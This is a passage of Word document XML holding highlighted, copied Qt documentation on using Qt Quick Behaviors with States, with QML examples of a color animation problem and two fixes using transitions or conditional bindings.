            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Examples - Animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRDefault="0018577B" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00365F6D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2512" w:history="1">
        <w:r w:rsidR="00365F6D" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-statesanimations-behaviors.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="009C0F4C" w:rsidRDefault="00EE2C1C" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2144" w:name="_Toc483000993"/>
      <w:bookmarkStart w:id="2145" w:name="_Toc483003984"/>
      <w:bookmarkStart w:id="2146" w:name="_Toc483604335"/>
      <w:bookmarkStart w:id="2147" w:name="_Toc483605555"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Qt Quick Behaviors with States</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2144"/>
      <w:bookmarkEnd w:id="2145"/>
      <w:bookmarkEnd w:id="2146"/>
      <w:bookmarkEnd w:id="2147"/>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2148" w:name="using-behaviors-with-states"/>
      <w:bookmarkEnd w:id="2148"/>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In some cases you may choose to use a Behavior to animate a property change caused by a state change</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While this works well for some situations, in other </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>situations it may lead to unexpected behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's an </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that shows the problem:</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import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QtQuick</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2.0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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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400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height</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400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Rectangle</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id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coloredRect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width</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100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height</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100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anchors</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centerIn</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parent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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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ColorAnimation</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EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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MouseArea</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id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mouser</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anchors</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fill</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parent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hoverEnabled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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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8D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>states</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State</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EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GreenState"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouser</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containsMouse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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PropertyChanges</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EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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target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coloredRect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="008D4C56" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Testing the example by quickly and repeatedly moving the mouse in to and out of the colored rectangle shows that the colored rectangle will settle into a green color over time, never returning to full red. This is not what we wanted! The problem occurs because we have used a Behavior to animate the change in color, and our state change is trigged by the mouse entering or exiting the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2513" w:history="1">
        <w:r w:rsidRPr="00EE2C1C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is easily interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To state the problem more formally, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using States and Behaviors together can cause unexpected behavior when</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior is used to animate a property change</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specifically when moving from an explicitly defined state back to the implicit base state</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this Behavior can be interrupted to (re-)enter an explicitly defined state</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0F4C" w:rsidRDefault="009C0F4C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>problem occurs because of the way the base state is defined for QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: as the "snapshot" state of the application just prior to entering an explicitly defined state.</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this</w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this case, if we are in the process of animating from green back to red, and interrupt the animation to return to "GreenState", the base state will include the color in its intermediate, mid-animation form.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While future versions of QML should be able to handle this situation more gracefully, there are currently several ways to rework your application to avoid this problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use a transition to animate the change, rather than a Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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400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height</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400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Rectangle</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id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coloredRect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width</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100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height</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100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anchors</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centerIn</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parent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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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MouseArea</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id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mouser</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anchors</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fill</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parent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hoverEnabled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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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states</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State</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GreenState"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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouser</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containsMouse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PropertyChanges</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target</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coloredRect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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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transitions</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Transition</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ColorAnimation</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use a conditional binding to change the property value, rather than a state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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import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QtQuick</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2.0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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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400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height</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400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Rectangle</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id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coloredRect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width</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100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height</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100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anchors</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centerIn</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parent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color</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mouser</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containsMouse </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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
